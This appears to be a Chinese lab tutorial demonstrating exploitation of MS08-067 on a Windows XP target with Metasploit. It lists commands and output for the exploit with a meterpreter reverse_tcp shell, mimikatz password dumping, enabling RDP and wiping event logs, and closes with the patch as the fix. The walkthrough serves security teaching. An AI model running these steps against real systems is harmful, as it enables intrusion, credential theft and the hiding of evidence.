Metasploit MS08-067 漏洞利用演示
Metasploit MS08-067 漏洞利用演示
- MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
原理解析:
- 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Windows系统主要的网络服务程序。
- SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
- MSRPC网络服务
- 这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
- ncacn_ip_tcp 135
- ncadg_ip_udp 135
- ncacn_np (TCP 139和445)主要是这个,SMB命名管道传输协议
- server服务--支持计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。
漏洞利用演示
演示环境
- 靶机:Windows XP sp3 (192.168.2.6)
- 攻击机:kali 2020 (192.168.2.3)
1、首先测试一下在Kali上能够ping通靶机
2、使用nmap扫描靶机是否存在MS08-067漏洞
- nmap --script=vuln 192.168.2.6
3、启动Metasploit
- msfconsle
4、搜索MS08-067的攻击模块
- search ms8-067
- 输出的信息一共包括6列,分别是#(模块编号)、Name(模块名称)、Disclosure Date(发布日期)、Rank(级别)、Check(是否支持检察)和Description(描述)。
5、启用该攻击模块
- use exploit/windows/smb/ms08_067_netapi
6、显示攻击载荷
- show payloads
7、查看支持的目标系统
- show targets
8、设置攻击有效载荷
- set payload windows/meterpreter/reverse_tcp
9、查看Payload配置选项
- show options
- 输出的信息包括模块选项、Payload选项和利用的目标三部分。前两个选项信息分为四列,分别是Name(名称)、Current Setting(当前设置)、Required(需要)和Description(描述)。如果Required列的值为yes,则表示该项必须设置;如果为no,则可以不设置。
10、设置RHOSTS选项
- set RHOSTS 192.168.2.6
11、实施渗透测试
- exploit 或者 run
12、Meterpreter
- Meterpreter是Metasploit的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
- 1)捕获屏幕
- meterpreter > screenshot
- Screenshot saved to: /root/diIxqzrL.jpeg
- 2)上传/下载文件
- meterpreter > upload 1.txt c:\\
- meterpreter > download c:\\1.txt
- 3)远程桌面
- meterpreter > run vnc
- 4)进入目标主机shell
- meterpreter > shell
- Process 960 created.
- Channel 14 created.
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:\WINDOWS\system32>exit
- exit
- meterpreter > shell
- 5)获取用户密码
- meterpreter > load mimikatz
- Loading extension mimikatz...Success.
- meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
- "0;70234","NTLM","ping","A-3326A091E7764","
- ping,A-3326A091E7764,abc.123"
- "0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY",""
- "0;996","Negotiate","NETWORK SERVICE","NT AUTHORITY","
- A-3326A091E7764$,WORKGROUP,"
- "0;45664","NTLM","","",""
- "0;999","NTLM","A-3326A091E7764$","WORKGROUP",""
- meterpreter > load mimikatz
- 6)启用远程桌面
- meterpreter > run post/windows/manage/enable_rdp
- [*] Enabling Remote Desktop
- [*] RDP is disabled; enabling it ...
- [*] Setting Terminal Services service startup mode
- [*] The Terminal Services service is not set to auto, changing it to auto ...
- [*] Opening port in local firewall if necessary
- [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201104235514_default_192.168.2.6_host.windows.cle_291746.txt
- 查看远程用户的空闲时长
- meterpreter > idletime
- User has been idle for: 19 mins 23 secs
- 使用rdesktop命令远程连接桌面
- root@kali:~# rdesktop 192.168.2.6
- Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
- Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
- root@kali:~# rdesktop 192.168.2.6
- meterpreter > run post/windows/manage/enable_rdp
- 7)清除日志
- meterpreter > clearev
- [*] Wiping 48 records from Application...
- [*] Wiping 63 records from System...
- [*] Wiping 0 records from Security...
- meterpreter > clearev
8)解决方案
- 升级到最新的Windows系统
- 安装KB958644补丁
Metasploit MS08-067 漏洞利用演示相关推荐
- 【愚公系列】2023年05月 网络安全高级班 079.Kali LinuxMetasploit渗透测试(Metasploit漏洞利用阶段)
文章目录 前言 一.Metasploit实战 1.漏洞利用阶段 1.1 网络服务攻击 1.1.1 MS12-020(Windows服务) 1.1.2 MS08-067(Windows服务) 1.1.3 ...
- MS17-010 漏洞利用+修复方法
一.实验环境 Kali:192.168.100.11 Windows 7靶机:192.168.100.12 二.漏洞复现 1.信息收集 nmap端口快速扫描 利用nmap漏洞脚本进行扫描 可以发现,靶 ...
- MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- 二进制漏洞利用原理--栈溢出
1. 进程的内存空间 但是不管什么样的操作系统.什么样的计算机架构,进程使用的内存都可以按照功能大致分成以下4个部分. (1)代码区:这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指并 ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- MS17-010永恒之蓝-漏洞利用+修复方法
前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...
- Metasploit技术(三)——漏洞利用
目录 四.漏洞利用 四.漏洞利用 每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统,微软公司会快速地开发针对这些Bug或漏洞地补丁,并为用户提供更新.全世界有大量地漏洞研究人员 ...
- Metasploit漏洞利用基础教程要出版了
Metasploit漏洞利用基础教程要出版了 我们的Metasploit漏洞利用基础教程已经委托机械工业出版社出版.出版书名为<从实践中学习Metasploit 5渗透测试>.预计上市时间 ...
最新文章
- qt试用1(Eclipse+cdt+Qt)
- Excel提取超链接信息
- springCloud学习笔记系列(1)-负载均衡Ribbon
- python和c-C和Python我该先学什么?
- Linux开发中 MD5值的计算
- Transformation XML(TCODE-STRANS)
- ios 重复引用 静态库_iOS 解决一个因三方静态库冲突产生的duplicate symbol的问题...
- Ubuntu搭建tftp服务器
- ajax中url是什么意思_装修中的阳台封窗是什么意思?
- mariadb数据库基础
- 在CMD上运行使用java命令运行java文件时出现错误:找不到或者无法加载主类的问题 解决办法
- 大蟒蛇Python平台相关知识
- 数据库查询优化-添加索引
- Cache数据库之ECP搭建
- Oracle Statistic 统计
- TensorFlow学习【1】--TensorFlow下载安装
- 一台显示器分成双屏_双屏办公,用起来到底有多爽
- Java学习——类和对象(上)
- 李子柒重回大众视野,拿回商标
- Java中Scanner 的用法/ Scanner怎么使用